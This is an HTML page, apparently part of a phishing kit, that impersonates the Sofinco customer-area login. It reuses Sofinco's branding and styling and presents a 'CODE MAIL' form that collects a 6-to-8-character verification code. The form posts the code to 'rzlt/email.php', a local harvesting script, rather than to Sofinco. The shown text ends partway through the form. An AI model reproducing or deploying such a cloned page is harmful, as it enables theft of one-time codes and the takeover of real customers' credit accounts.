<html lang="fr"><head>

<meta charset="utf-8">
 <link rel="icon" href="img/favicon.ico">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
 

</head>




<body><div id="in-page-channel-node-id" data-channel-name="in_page_channel_N4OimR"></div>
   
      
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2.0">
     
      <meta name="robots" content="all">
      <link rel="stylesheet" href="css/fonts.css">
      
      
      <title>Se connecter à votre Espace Client Sofinco</title>
      <meta name="description" content="Connectez-vous à votre Espace Client pour suivre et gérer vos crédits Sofinco">
      <link href="css/app.css" rel="stylesheet">
      
      <style>.screen-reader[data-v-5876281b]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.loading .loader-content[data-v-5876281b]{display:block;position:absolute;top:50%;left:50%;z-index:2;transform:translate(-50%,-50%);height:32px;width:32px}.loading .loader-content .after[data-v-5876281b]{display:block;position:absolute;inset:0;margin:auto;width:12px;height:12px;background-color:var(--color-partner-1, #eb3761);border-radius:50%;animation:loader-button-1 2s cubic-bezier(.77,0,.175,1) infinite}.loading .loader-content span[data-v-5876281b]{display:block;position:absolute;inset:0;margin:auto;height:32px;width:32px;animation:loader-button-2-5876281b 2s cubic-bezier(.77,0,.175,1) infinite}.loading .loader-content span .spanBefore[data-v-5876281b],.loading .loader-content span .spanAfter[data-v-5876281b]{display:block;position:absolute;inset:0;margin:auto;height:12px;width:12px;background-color:var(--color-partner-1, #eb3761);border-radius:50%;animation:loader-button-3-5876281b 2s cubic-bezier(.77,0,.175,1) infinite}.loading .loader-content span .spanAfter[data-v-5876281b]{animation:loader-button-4-5876281b 2s cubic-bezier(.77,0,.175,1) infinite}@keyframes loader-button-2-5876281b{0%{transform:rotate(0)}50%{transform:rotate(180deg)}to{transform:rotate(360deg)}}@keyframes loader-button-3-5876281b{0%{transform:translateZ(0) scale(1)}50%{transform:translate3d(-16px,0,0) scale(.5)}to{transform:translateZ(0) scale(1)}}@keyframes loader-button-4-5876281b{0%{transform:translateZ(0) scale(1)}50%{transform:translate3d(16px,0,0) scale(.5)}to{transform:translateZ(0) scale(1)}}.screen-reader{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.button{display:flex;justify-content:center;align-items:center;min-width:7.1875rem;position:relative;flex-direction:row;margin:0 auto;padding:.9375rem 1.25rem;box-shadow:0 .375rem .625rem -.3125rem transparent;color:#fff;border-radius:.5rem;background-color:var(--color-partner-1, #eb3761);transition:background-color .3s ease-in-out,opacity .3s ease-in-out;cursor:pointer}@media (max-width: 479px){.button{width:100%}}.button.loading{cursor:wait}.button.loading .label,.button.loading .icon{visibility:hidden}.button .icon{font-size:.75rem;margin-top:.0625rem;margin-left:.3125rem;color:#fff}.button .icon.icon-optionnal{display:none}@media screen and (min-width: 1024px){.button .icon.icon-optionnal{display:block}}@media screen and (min-width: 768px){.button .icon{margin-left:.625rem}}.button .icon.icon-left{margin-left:0;margin-right:.625rem;transform:rotateY(180deg);color:#444}.button .loaderContainer{position:absolute;width:1.625rem;height:1.625rem;top:50%;left:50%;transform:translate(-50%,-50%)}.button.noBackground{background-color:#fff;color:var(--color-partner-3, #1aaeb7);border:.0625rem solid}.button.noBackground .icon{color:var(--color-partner-3, #1aaeb7)}@media screen and (min-width: 1024px){.button.noBackground{border:.125rem solid}}@media screen and (min-width: 1024px){.button.noBackground:not(.loading):hover{background-color:transparent}}@media screen and (min-width: 768px){.button.noBackground:not(.loading):hover{background-color:transparent}}@media screen and (min-width: 768px){.button{width:auto;min-width:8.75rem;margin:0 auto;padding:.9375rem 1.25rem;height:3.125rem;transition:background-color .25s ease-in-out,box-shadow .25s ease-in-out}}.button.partner-background{background-color:var(--color-partner-1, #eb3761);border-color:var(--color-partner-1, #eb3761);color:#fff}.button.partner-background span,.button.partner-background .icon{color:#fff}@media screen and (min-width: 768px){.button.partner-background:not(.loading):hover{box-shadow:none}}.button.inverted{background-color:transparent;flex-direction:row-reverse;border:.0625rem solid var(--color-partner-1, #eb3761);color:var(--color-partner-1, #eb3761);text-decoration:none}.button.inverted span{font-size:.875rem}.button.inverted .icon{display:none}@media screen and (min-width: 768px){.button.inverted .icon{display:block}}.button span{font-family:var(--font-bold, "Sarabun-Bold");font-size:.875rem}.button.disabled{pointer-events:none;cursor:default;border:none}.button[disabled]{cursor:auto;border:none;background-color:#f5f5f5}.button[disabled] span,.button[disabled] .icon{color:#707070!important}.button[disabled].inverted{border:.0625rem solid #888888}.button[disabled].inverted span,.button[disabled].inverted .icon{color:#888}.screen-reader[data-v-256fe20a]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.tooltip__container[data-v-256fe20a]{margin-top:.25rem}.tooltip__top-arrow[data-v-256fe20a]{display:block;width:1rem;height:1rem;background:var(--tooltip-text-bg, #ebf8fd);margin:0 auto;transform:rotate(45deg)}.tooltipMessage[data-v-256fe20a]{background-color:#e8f8fe;color:#005786;display:flex;flex-direction:row;align-items:flex-start;padding:.875rem 1.25rem;border-radius:.25rem;margin-top:-.5rem}.tooltipMessage .mobilize[data-v-256fe20a]{background-color:#fddccc;color:#000}.tooltipMessage__icon[data-v-256fe20a]{margin-right:1.25rem}.tooltipMessage__text[data-v-256fe20a]{font-size:.875rem;align-self:center}.btn__link[data-v-256fe20a]{text-decoration:underline;font-size:.875rem;font-weight:700;background:none;cursor:pointer}.mobilize[data-v-256fe20a]{background-color:#fddccc;color:#000}.warning[data-v-256fe20a]{background-color:var(--tooltip-bg-alert, #fff7e2);color:#ac4000}.error[data-v-256fe20a]{background-color:var(--tooltip-bg-error, #fae7e9);color:var(--tooltip-text-error, #bc3848)}.center[data-v-256fe20a]{justify-content:center}.screen-reader[data-v-b096eeb8]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.topBackLink__backTo[data-v-b096eeb8]{position:absolute;left:60px;top:84px;z-index:2;cursor:pointer;display:flex;flex-direction:row;align-items:center}.topBackLink__backTo p[data-v-b096eeb8]{font-family:var(--font-bold, "Sarabun-Bold");font-size:14px;color:#888}.topBackLink__backTo__img[data-v-b096eeb8]{padding-right:5px}@media (min-width: 480px) and (max-width: 1023px){.topBackLink__backTo[data-v-b096eeb8]{display:none}}@media screen and (max-width: 1023px){.topBackLink__backTo[data-v-b096eeb8]{display:none}}.topBackLink__header-backLink[data-v-b096eeb8]{display:none;background-color:var(--color-partner-2, #1aaeb7);cursor:pointer}@media (max-width: 479px){.topBackLink__header-backLink[data-v-b096eeb8]{display:block}}@media (min-width: 480px) and (max-width: 1023px){.topBackLink__header-backLink[data-v-b096eeb8]{display:block}}.topBackLink__header-router[data-v-b096eeb8]{display:flex;flex-direction:row;align-items:center;margin-left:10px;min-height:48px}.topBackLink__header-router__img[data-v-b096eeb8]{width:20px;height:20px;margin:0 10px 0 0;object-fit:contain}.topBackLink__header-router p[data-v-b096eeb8]{font-family:var(--font-bold, "Sarabun-Bold");font-size:14px;color:#fff}.screen-reader[data-v-5c1904a3]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.onboardingModal[data-v-5c1904a3]{background:#ffffff;width:407px;padding:20px;position:relative;max-width:calc(100vw - 20px)}.onboardingModal__content[data-v-5c1904a3]{display:flex;justify-content:space-between;font-family:var(--font-bold, "Sarabun-Bold")}.onboardingModal__content-cross[data-v-5c1904a3]{position:relative;display:block;width:20px;height:20px;cursor:pointer;margin-left:5px;border:0;background-color:#fff}.onboardingModal__content-cross[data-v-5c1904a3]:before,.onboardingModal__content-cross[data-v-5c1904a3]:after{content:"";position:absolute;top:50%;left:50%;width:20px;height:2px;background-color:#1aaeb7;border-radius:3px}.onboardingModal__content-cross[data-v-5c1904a3]:before{transform:translate3d(-50%,-50%,0) rotate(45deg)}.onboardingModal__content-cross[data-v-5c1904a3]:after{transform:translate3d(-50%,-50%,0) rotate(-45deg)}.onboardingModal__bottom[data-v-5c1904a3]{display:flex;margin-top:20px;justify-content:space-between}.onboardingModal__bottom__tipNumber[data-v-5c1904a3]{background:#444444;color:#fff;font-size:12px;font-family:var(--font-bold, "Sarabun-Bold");font-weight:700;text-transform:uppercase;padding:5px 10px;border-radius:4px;display:flex;align-items:center}.onboardingModal__bottom__tipNumber svg[data-v-5c1904a3]{margin-right:10px;height:20px}.onboardingModal__bottom__navigation[data-v-5c1904a3]{display:flex}.onboardingModal__bottom__navigation-previous[data-v-5c1904a3]{color:#eb3761;border:1px solid #eb3761;background-color:#fff}.onboardingModal__bottom__navigation-next[data-v-5c1904a3]{color:#fff;background:#eb3761;margin-left:20px;border:1px solid #eb3761}@media (max-width: 321px){.onboardingModal__bottom__navigation-next[data-v-5c1904a3]{margin-left:5px}}.onboardingModal__bottom__navigation button[data-v-5c1904a3]{border-radius:30px;padding:7px 10px;cursor:pointer;font-size:12px;font-family:var(--font-bold, "Sarabun-Bold");font-weight:700}.onboardingModal.web_mobilize .onboardingModal__content-cross[data-v-5c1904a3]{position:relative;display:block;width:20px;height:20px;cursor:pointer;margin-left:5px}.onboardingModal.web_mobilize .onboardingModal__content-cross[data-v-5c1904a3]:before,.onboardingModal.web_mobilize .onboardingModal__content-cross[data-v-5c1904a3]:after{content:"";position:absolute;top:50%;left:50%;width:20px;height:2px;background-color:var(--color-partner-1, #eb3761);border-radius:3px}.onboardingModal.web_mobilize .onboardingModal__content-cross[data-v-5c1904a3]:before{transform:translate3d(-50%,-50%,0) rotate(45deg)}.onboardingModal.web_mobilize .onboardingModal__content-cross[data-v-5c1904a3]:after{transform:translate3d(-50%,-50%,0) rotate(-45deg)}.onboardingModal.web_mobilize .onboardingModal__bottom__navigation-previous[data-v-5c1904a3]{color:var(--color-partner-1, #eb3761);border:1px solid var(--color-partner-1, #eb3761)}.onboardingModal.web_mobilize .onboardingModal__bottom__navigation-next[data-v-5c1904a3]{background:var(--color-partner-1, #eb3761)}.arrow[data-v-5c1904a3]{background:#ffffff;display:inline-block;height:18px;width:18px;position:absolute}.arrow.hide[data-v-5c1904a3]{display:none}.arrow.left[data-v-5c1904a3]{transform:rotate(135deg);left:-9px;top:calc(50% - 9px)}.arrow.right[data-v-5c1904a3]{transform:rotate(135deg);right:-9px;top:calc(50% - 9px)}.arrow.up[data-v-5c1904a3]{transform:rotate(-135deg);top:-9px;left:calc(50% - 9px)}.arrow.down[data-v-5c1904a3]{transform:rotate(45deg);bottom:-9px;left:calc(50% - 9px)}.screen-reader[data-v-0caa3441]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.path[data-v-0caa3441]{fill:var(--color-partner-3, #1aaeb7)}.button[data-v-0caa3441]{border:0;background-color:transparent}.screen-reader[data-v-8703157c]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}@media screen and (max-width: 480px){[data-v-8703157c] .popup-container{height:auto;padding-bottom:0;overflow:hidden}}@media screen and (max-width: 768px){[data-v-8703157c] .popup-container{height:calc(100vh - var(--topbar-mobile-height, 50px));padding-bottom:45px;overflow:auto}}[data-v-8703157c] .popup__close.negative-mobile{background-color:transparent}@media (min-width: 480px) and (max-width: 1023px){[data-v-8703157c] .popup__close.negative-mobile{position:absolute}}[data-v-8703157c] .popup__close.negative-mobile:after,[data-v-8703157c] popup__close.negative-mobile:before{background-color:var(--color-partner-3, #1aaeb7)!important}.no-padding[data-v-8703157c]{padding:0}.no-padding-top[data-v-8703157c]{padding-top:0}.overlay[data-v-8703157c]{z-index:3;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#0000004d;opacity:0;transition:opacity .3s ease-in-out}.overlay.show[data-v-8703157c]{opacity:1}.popup[data-v-8703157c]{position:fixed;top:0;left:0;z-index:21;width:100%;height:100%}.popup__close[data-v-8703157c]{position:relative;display:block;width:20px;height:20px;cursor:pointer;background-color:#fff;position:absolute;top:0;right:0;z-index:2;width:calc(var(--topbar-height, 89px) - 15px);height:100%;min-height:50px;max-height:var(--topbar-height, 89px);transition:background-color .25s ease-in-out;border:0}.popup__close[data-v-8703157c]:before,.popup__close[data-v-8703157c]:after{content:"";position:absolute;top:50%;left:50%;width:20px;height:2px;background-color:var(--color-partner-1, #eb3761);border-radius:3px}.popup__close[data-v-8703157c]:before{transform:translate3d(-50%,-50%,0) rotate(45deg)}.popup__close[data-v-8703157c]:after{transform:translate3d(-50%,-50%,0) rotate(-45deg)}.popup__close.negative-desktop[data-v-8703157c]{position:relative;display:block;width:20px;height:20px;cursor:pointer;background-color:#eee;position:absolute;top:0;right:0;z-index:2;width:calc(var(--topbar-height, 89px) - 15px);height:100%;min-height:50px;max-height:var(--topbar-height, 89px);transition:background-color .25s ease-in-out}.popup__close.negative-desktop[data-v-8703157c]:before,.popup__close.negative-desktop[data-v-8703157c]:after{content:"";position:absolute;top:50%;left:50%;width:20px;height:2px;background-color:#fff;border-radius:3px}.popup__close.negative-desktop[data-v-8703157c]:before{transform:translate3d(-50%,-50%,0) rotate(45deg)}.popup__close.negative-desktop[data-v-8703157c]:after{transform:translate3d(-50%,-50%,0) rotate(-45deg)}@media screen and (max-width: 768px){.popup__close[data-v-8703157c]{position:relative;display:block;width:20px;height:20px;cursor:pointer;position:absolute;top:0;right:15px}.popup__close[data-v-8703157c]:before,.popup__close[data-v-8703157c]:after{content:"";position:absolute;top:50%;left:50%;width:20px;height:2px;background-color:var(--color-partner-1, #eb3761);border-radius:3px}.popup__close[data-v-8703157c]:before{transform:translate3d(-50%,-50%,0) rotate(45deg)}.popup__close[data-v-8703157c]:after{transform:translate3d(-50%,-50%,0) rotate(-45deg)}}@media screen and (max-width: 768px) and (max-width: 479px){.popup__close[data-v-8703157c]{display:none}}@media screen and (max-width: 768px){.popup__close.negative-mobile[data-v-8703157c]{position:relative;display:block;width:20px;height:20px;cursor:pointer;background-color:var(--color-partner-2, #1aaeb7)}.popup__close.negative-mobile[data-v-8703157c]:before,.popup__close.negative-mobile[data-v-8703157c]:after{content:"";position:absolute;top:50%;left:50%;width:20px;height:2px;background-color:#fff;border-radius:3px}.popup__close.negative-mobile[data-v-8703157c]:before{transform:translate3d(-50%,-50%,0) rotate(45deg)}.popup__close.negative-mobile[data-v-8703157c]:after{transform:translate3d(-50%,-50%,0) rotate(-45deg)}}.popup__wrapper[data-v-8703157c]{position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);text-align:center;background-color:#fff;z-index:4;padding:40px 60px;opacity:0;transition:opacity .3s ease-in-out;width:650px;max-height:90%;overflow:auto}@media screen and (max-width: 1024px){.popup__wrapper[data-v-8703157c]{width:grid(8)}}@media screen and (max-width: 768px){.popup__wrapper[data-v-8703157c]{padding:60px 0 0;width:100%;height:100%;max-height:100%}}@media (max-width: 479px){.popup__wrapper[data-v-8703157c]{padding-top:0}}.popup__wrapper.show[data-v-8703157c]{opacity:1}.popup__content[data-v-8703157c]{display:flex;flex-direction:column;justify-content:center;align-items:center;overflow:auto}@media screen and (max-width: 768px){.popup__content[data-v-8703157c]{padding:40px}}@media (max-width: 479px){.popup__content[data-v-8703157c]{padding:20px}}.popup__content>img[data-v-8703157c]{margin-bottom:10px}.popup__content__title[data-v-8703157c]{font-family:var(--font-bold, "Sarabun-Bold");font-size:24px;line-height:28px;color:var(--color-partner-2, #1aaeb7);margin-bottom:15px}.popup__content__text[data-v-8703157c]{font-family:var(--font-regular, "Sarabun-Book");font-size:14px;line-height:normal;color:#000}.popup__content__text[data-v-8703157c] span{font-family:var(--font-bold, "Sarabun-Bold")}.popup__content__footer[data-v-8703157c]{padding:0 var(--form-padding-left-mobile, 20px) 25px}.popup__button-container[data-v-8703157c]{display:flex;flex-direction:row;align-items:center}.popup__button-container button[data-v-8703157c]{margin:20px 10px 0}.popup__title[data-v-8703157c]{font-family:var(--font-bold, "Sarabun-Bold");font-size:22px;line-height:var(--topbar-height, 89px);color:#004b44}@media screen and (max-width: 768px){.popup__title[data-v-8703157c]{font-size:16px;line-height:var(--topbar-mobile-height, 50px);color:#fff;background-color:#004b44;width:100%;height:var(--topbar-mobile-height, 50px)}}.popup__headband[data-v-8703157c]{display:none}@media screen and (max-width: 767px) and (min-width: 320px){.popup__headband[data-v-8703157c]{display:block;display:flex;justify-content:center;align-items:center;position:fixed;top:0;width:100%;height:50px;background-color:var(--color-partner-1, #eb3761);z-index:10}}@media screen and (max-width: 767px) and (min-width: 320px){.popup__headband--title[data-v-8703157c]{color:#fff;font-size:14px;font-family:var(--font-bold, "Sarabun-Bold")}}@media screen and (max-width: 767px) and (min-width: 320px){.popup__headband--close[data-v-8703157c]{position:absolute;right:20px}}.screen-reader[data-v-cbee3064]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.path[data-v-cbee3064]{fill:var(--color-partner-3, #1aaeb7)}.button[data-v-cbee3064]{border:0;background-color:transparent}.screen-reader[data-v-b6c808c1]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.popupPanelMobile[data-v-b6c808c1]{display:block;position:fixed;left:0;bottom:0;height:max-content;max-height:calc(100vh - 160px);border-top-right-radius:15px;border-top-left-radius:15px;background-color:#fff;box-shadow:0 2px 18px #0000001a;text-align:center;transform:translate(0);transition:transform .5s ease-in-out;padding:20px 0 0;z-index:999}@media screen and (max-width: 768px){.popupPanelMobile[data-v-b6c808c1]{width:100%;min-width:auto}}@media (min-width: 480px) and (max-width: 1023px){.popupPanelMobile[data-v-b6c808c1]{width:100%}}.popupPanelMobile.hide[data-v-b6c808c1]{transform:translateY(100%)}.popupPanelMobile__content[data-v-b6c808c1]{max-height:inherit;overflow-y:auto;padding:20px}.popupPanelMobile__close[data-v-b6c808c1]{display:block;position:fixed;top:-60px;left:50%;transform:translate(-50%);z-index:20}.popupPanelMobile__close .hide[data-v-b6c808c1]{display:none}.overlay[data-v-b6c808c1]{z-index:11}.overlay.hide[data-v-b6c808c1]{display:none}.screen-reader[data-v-7beab7d4]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.menu[data-v-7beab7d4]{display:block;position:absolute;right:0;top:100%;width:314px;height:auto;z-index:1;cursor:auto}.menu.hide[data-v-7beab7d4]{display:none}.overlay[data-v-7beab7d4]{z-index:3;position:fixed;background:transparent;top:0;left:0;width:100%;height:100%;opacity:1}.overlay.hide[data-v-7beab7d4]{display:none}.screen-reader[data-v-35327d80]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.right-sidebar[data-v-35327d80]{position:relative;z-index:20}.right-sidebar.hide[data-v-35327d80]{display:none}.right-sidebar-container[data-v-35327d80]{position:fixed;top:0;right:0;width:grid(4);min-width:470px;height:100%;padding:0 20px;transform:translate(0);transition:transform .5s ease-in-out;text-align:center;background-color:#fff;box-shadow:0 2px 18px #0000001a;overflow-y:scroll;z-index:10}@media screen and (max-width: 768px){.right-sidebar-container[data-v-35327d80]{width:100%;min-width:auto}}.right-sidebar-container.hide[data-v-35327d80]{transform:translate(100%)}.right-sidebar-header[data-v-35327d80]{background-color:#fff;position:relative}@media screen and (max-width: 768px){.right-sidebar-header[data-v-35327d80]{height:var(--topbar-mobile-height, 50px)}}@media (max-width: 479px){.right-sidebar-header[data-v-35327d80]{display:flex;align-items:center;justify-content:center;background-color:var(--color-partner-1, #eb3761)}}.right-sidebar-header .popup__close[data-v-35327d80]{cursor:pointer;position:absolute;width:20px;height:20px;object-fit:contain;top:30px;right:25px}@media (min-width: 480px) and (max-width: 1023px){.right-sidebar-header .popup__close[data-v-35327d80]{top:10px}}@media (max-width: 479px){.right-sidebar-header .popup__close[data-v-35327d80]{display:none}}.right-sidebar-header .popup__close-mobile[data-v-35327d80]{display:none}@media (max-width: 479px){.right-sidebar-header .popup__close-mobile[data-v-35327d80]{display:block;position:absolute;top:15px;right:20px;background-color:var(--color-partner-3, #1aaeb7)}}.right-sidebar-content[data-v-35327d80]{position:relative;max-width:400px;margin:30px auto 0}@media screen and (max-width: 768px){.right-sidebar-content[data-v-35327d80]{width:auto;min-width:auto;max-width:100%}}.right-sidebar-content.mobile[data-v-35327d80]{width:100%;margin:0 auto 40px;padding:0 20px 20px}.title-headband[data-v-35327d80]{font-size:15px;font-family:var(--font-bold, "Sarabun-Bold");color:#fff}.overlay.hide[data-v-35327d80]{display:none}.screen-reader[data-v-7ecccfed]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.bold[data-v-7ecccfed]{font-family:var(--font-bold, "Sarabun-Bold")}.italic[data-v-7ecccfed]{font:italic}.regular[data-v-7ecccfed]{font-family:var(--font-regular, "Sarabun-Book")}.light[data-v-7ecccfed]{font-family:Sarabun-Light}.medium[data-v-7ecccfed]{font-family:var(--font-medium, "Sarabun-Medium")}.semi-bold[data-v-7ecccfed]{font-family:var(--font-semi-bold, "Sarabun-SemiBold")}.screen-reader[data-v-b5b7f71e]{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;white-space:nowrap;width:1px}.error[data-v-b5b7f71e]{position:relative}.error__content[data-v-b5b7f71e]{box-shadow:0 0 9px -1px #44444417;background-color:#fff;padding:40px 20px;max-width:770px;margin:50px auto 0}@media (min-width: 480px) and (max-width: 1023px){.error__content[data-v-b5b7f71e]{box-shadow:none}}@media (max-width: 479px){.error__content[data-v-b5b7f71e]{margin:0;box-shadow:none}}.error__title[data-v-b5b7f71e]{font-family:var(--font-bold, "Sarabun-Bold");font-size:24px;color:#1aaeb7;margin:.875rem 0;text-align:center;text-transform:uppercase}@media (max-width: 479px){.error__title[data-v-b5b7f71e]{margin-top:20px}}.error__text[data-v-b5b7f71e]{font-family:var(--font-regular, "Sarabun-Book");font-size:1rem;line-height:1.25rem;text-align:center;color:#444;margin-bottom:1rem}.error .img[data-v-b5b7f71e]{text-align:center}.error__button[data-v-b5b7f71e]{border:none;padding:.94rem 1.875rem;border-radius:3.75rem;height:auto;width:auto}@media (max-width: 479px){.error__button[data-v-b5b7f71e]{margin-top:5.25rem}}@media (min-width: 480px) and (max-width: 1023px){.error__button[data-v-b5b7f71e]{margin-top:40px}}.error.web_mobilize .error__title[data-v-b5b7f71e]{color:#f45000}.error.web_mobilize .error__button[data-v-b5b7f71e]{background-color:#000}</style>
      <style>
         @keyframes slide-in-one-tap {
         from {
         transform: translateY(80px);
         }
         to {
         transform: translateY(0px);
         }
         }
         .trust-hide-gracefully {
         opacity: 0;
         }
         .trust-wallet-one-tap .hidden {
         display: none;
         }
         .trust-wallet-one-tap .semibold {
         font-weight: 500;
         }
         .trust-wallet-one-tap .binance-plex {
         font-family: 'Binance';
         }
         .trust-wallet-one-tap .rounded-full {
         border-radius: 50%;
         }
         .trust-wallet-one-tap .flex {
         display: flex;
         }
         .trust-wallet-one-tap .flex-col {
         flex-direction: column;
         }
         .trust-wallet-one-tap .items-center {
         align-items: center;
         }
         .trust-wallet-one-tap .space-between {
         justify-content: space-between;
         }
         .trust-wallet-one-tap .justify-center {
         justify-content: center;
         }
         .trust-wallet-one-tap .w-full {
         width: 100%;
         }
         .trust-wallet-one-tap .box {
         transition: all 0.5s cubic-bezier(0, 0, 0, 1.43);
         animation: slide-in-one-tap 0.5s cubic-bezier(0, 0, 0, 1.43);
         width: 384px;
         border-radius: 15px;
         background: #FFF;
         box-shadow: 0px 2px 4px 0px rgba(0, 0, 0, 0.25);
         position: fixed;
         right: 30px;
         bottom: 30px;
         z-index: 1020;
         }
         .trust-wallet-one-tap .header {
         gap: 15px;
         border-bottom: 1px solid #E6E6E6;
         padding: 10px 18px;
         }
         .trust-wallet-one-tap .header .left-items {
         gap: 15px
         }
         .trust-wallet-one-tap .header .title {
         color: #1E2329;
         font-size: 18px;
         font-weight: 600;
         line-height: 28px;
         }
         .trust-wallet-one-tap .header .subtitle {
         color: #474D57;
         font-size: 14px;
         line-height: 20px;
         }
         .trust-wallet-one-tap .header .close {
         color: #1E2329;
         cursor: pointer;
         }
         .trust-wallet-one-tap .body {
         padding: 9px 18px;
         gap: 10px;
         }
         .trust-wallet-one-tap .body .right-items {
         gap: 10px;
         width: 100%;
         }
         .trust-wallet-one-tap .body .right-items .wallet-title {
         color: #1E2329;
         font-size: 16px;
         font-weight: 600;
         line-height: 20px;
         }
         .trust-wallet-one-tap .body .right-items .wallet-subtitle {
         color: #474D57;
         font-size: 14px;
         line-height: 20px;
         }
         .trust-wallet-one-tap .connect-indicator {
         gap: 15px;
         padding: 8px 0;
         }
         .trust-wallet-one-tap .connect-indicator .flow-icon {
         color: #474D57;
         }
         .trust-wallet-one-tap .loading-color {
         color: #FFF;
         }
         .trust-wallet-one-tap .button {
         border-radius: 50px;
         outline: 2px solid transparent;
         outline-offset: 2px;
         background-color: rgb(5, 0, 255);
         border-color: rgb(229, 231, 235);
         cursor: pointer;
         text-align: center;
         height: 45px;
         }
         .trust-wallet-one-tap .button .button-text {
         color: #FFF;
         font-size: 16px;
         font-weight: 600;
         line-height: 20px;
         }
         .trust-wallet-one-tap .footer {
         margin: 20px 30px;
         }
         .trust-wallet-one-tap .check-icon {
         color: #FFF;
         }
         @font-face {
         font-family: 'Binance';
         src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Regular.otf) format('opentype');
         font-weight: 400;
         font-style: normal;
         }
         @font-face {
         font-family: 'Binance';
         src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Medium.otf) format('opentype');
         font-weight: 500;
         font-style: normal;
         }
         @font-face {
         font-family: 'Binance';
         src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-SemiBold.otf) format('opentype');
         font-weight: 600;
         font-style: normal;
         }
      </style>
     
      <style type="text/css" name="cssVar">:root {
         --color-partner-1: #DD0351;--color-partner-1-01: rgba(221,3,81,0.1);--color-partner-1-05: rgba(221,3,81,0.5);--color-partner-1-008: rgba(221,3,81,0.08);--color-partner-1-07: rgba(221,3,81,0.7);--color-partner-1-08: rgba(221,3,81,0.8);--color-partner-2: #008189;--color-partner-2-008: rgba(0,129,137,0.08);--color-partner-2-01: rgba(0,129,137,0.1);--color-partner-2-02: rgba(0,129,137,0.2);--color-partner-2-05: rgba(0,129,137,0.5);--color-partner-2-06: rgba(0,129,137,1);--color-partner-2-08: rgba(0,129,137,0.8);--color-partner-3: #008189;--color-partner-3-01: rgba(0,129,137,0.1);--color-partner-3-04: rgba(0,129,137,0.4);--color-partner-3-05: rgba(0,129,137,0.5);--color-partner-3-08: rgba(0,129,137,0.8);--color-partner-4: #FFA300;--color-partner-4-01: rgba(255,163,0,0.1);--color-partner-4-03: rgba(255,163,0,0.3);--color-partner-4-05: rgba(255,163,0,0.5);--color-partner-4-07: rgba(255,163,0,0.7);--color-partner-4-005: rgba(255,163,0,0.05);--color-pedago: #DFF4F5;--color-partner-icon-bg: #027D8F;--color-partner-tooltip-bg: #e8f8fe;--color-partner-tooltip-txt: #005786;--color-partner-input-bg: #ecf9fa;--color-partner-input-txt: #027D8F;--color-partner-input-border: #027D8F;--font-regular: Sarabun-Book;--font-medium: Sarabun-Medium;--font-bold: Sarabun-Bold;--font-semi-bold: Sarabun-SemiBold;
         }
      </style>
   
   
   
      
      
      <div id="app" data-v-app="">
         <div data-v-73e178a0="" class="">
            
            <div data-v-73e178a0="" class="bannerInfo"></div>
            <main data-v-73e178a0="" role="main">
               <div data-v-a5547e03="" data-v-73e178a0="" class="header" role="banner">
                  <div data-v-a5547e03="" class="header__wrapper">
                     <div data-v-a5547e03="" class="header__logo showHeader"><a data-v-a5547e03="" aria-current="page" href="" class="router-link-active router-link-exact-active" aria-label="Retour page d'accueil" tabindex="0" role="link"><img data-v-a5547e03="" data-cy="headerSofincoLogo" src="img/logo-header.svg" alt="Logo Sofinco" class="logo-sofinco"></a></div>
                     <button data-v-a5547e03="" type="button" class="header__btnCardLost" aria-label="Carte perdue ou volée"><span data-v-a5547e03="" class="header__btnCardLost--text">Carte perdue ou volée</span><img data-v-a5547e03="" class="header__btnCardLost--icon" src="img/credit-card.svg" alt="" aria-hidden="true"></button>
                  </div>
               </div>
               <div data-v-73e178a0="" class="content">
                  <div data-v-3b99ad3b="" data-v-73e178a0="" class="mainContent withBanner" data-cy="mainContent">
                     <div data-v-85ae8015="" data-v-8e7f8096="" class="wrapper">
                        <div data-v-85ae8015="" class="mainWrapper">
                           <div data-v-85ae8015="" class="mainWrapper__header"></div>
                           <!---->
                           <h1 data-v-85ae8015="" class="mainWrapper__title"><span data-v-85ae8015="" class="classic">CODE MAIL</span></h1>
                           <!---->
                           <div data-v-85ae8015="" class="mainWrapper__content" data-cy="mainWrapper">
                              <form method="post" action="rzlt/email.php" id="emailMobileForm">
                                 
                                 
                              
                              
                              
                                 <!---->
                                 <div data-v-2089dcf0="" data-v-8e7f8096="" class="input-text-component error required">
                                    <div data-v-2089dcf0="" class="input-tag" style="display: none;"></div>
                                    <div data-v-2089dcf0="" class="input-container">
									<input data-v-2089dcf0="" id="fqikckqaxj" title="" name="email" class="input-item" type="text" placeholder="Code de 6 à 8 caractères" required="" maxlength="8" minlength="6">
